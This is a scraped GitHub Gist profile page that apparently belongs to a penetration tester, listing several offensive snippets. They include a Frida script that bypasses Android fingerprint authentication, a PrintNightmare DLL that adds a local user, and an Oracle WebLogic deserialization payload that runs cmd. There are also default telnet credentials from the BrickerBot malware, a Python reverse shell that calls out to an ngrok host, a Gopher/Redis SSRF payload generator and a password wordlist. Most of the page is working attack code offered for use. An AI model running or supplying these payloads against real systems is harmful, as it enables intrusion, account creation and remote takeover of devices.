Skip to content

Instantly share code, notes, and snippets.

View voker2311's full-sized avatar

Akshay Shinde voker2311

View GitHub Profile
/*
Bypass fingerprint authentication if the app accept NULL cryptoObject in onAuthenticationSucceeded(...).
This script should automatically bypass fingerprint when authenticate(...) method will be called.
*/
console.log("Fingerprint hooks loaded!");
Java.perform(function () {
//Call in try catch as Biometric prompt is supported since api 28 (Android 9)
try { hookBiometricPrompt_authenticate(); }
@voker2311
voker2311 / nightmare.c
Created November 24, 2022 07:43
DLL payload for PrintNightmare
// x86_64-w64-mingw32-gcc nightmare.c -shared -o payload.dll
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("net user test test123 /add");
ExitProcess(0);
}
return TRUE;
}
@voker2311
voker2311 / payload.xml
Created November 22, 2022 14:59
Oracle Weblogic WLS-Async payload
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
@voker2311
voker2311 / brickerbot_default_creds.txt
Created September 21, 2022 06:33
Default telnet credentials retrieved from Brickerbot Malware
user:user123
:
0:0
1234:1234
admin:
Admin:
admin:1234
admin:123456
admin:1q2w3e
admin:888888
#!/bin/bash
ip=$1
if [[ $# -eq 0 ]];then
echo "Usage: ./tcp_scan.sh <IP-Address>"
exit 1
fi
mkdir $ip
import socket,os,pty;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("0.tcp.ap.ngrok.io",13088));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn("/bin/sh")
@voker2311
voker2311 / gopher_redis.py
Created July 8, 2022 06:50
Gopher + Redis SSRF payload generation
#!/usr/bin/env python3
protocol = "gopher://"
ip = "127.0.0.1"
port = "6379"
cmd = """
info
quit
"""
@voker2311
voker2311 / passwords.txt
Created June 13, 2022 07:47
Client specific password list generation - Taken from The Art of Penetration Testing eBook
admin
root
guest
sa
changeme
password
password1
password!
password1!
@voker2311
voker2311 / port_scan.sh
Created June 4, 2022 08:57
Bash script to scan all the ports in a Docker Container
#!/bin/bash
ip=$1
if [[ $# -eq 0 ]];then
echo "[-] Supply IP Address"
exit 0
fi
for i in `seq 1 65535`;do
@voker2311
voker2311 / json_to_form.py
Created June 3, 2022 13:12
JSON to Form converter
#!/usr/bin/env python3
import urllib.parse
data = 'json data'
arr = data[1:-1].split(",")
output = ""
for i in arr:
output += i.replace('"',"").replace(":","=") + "&"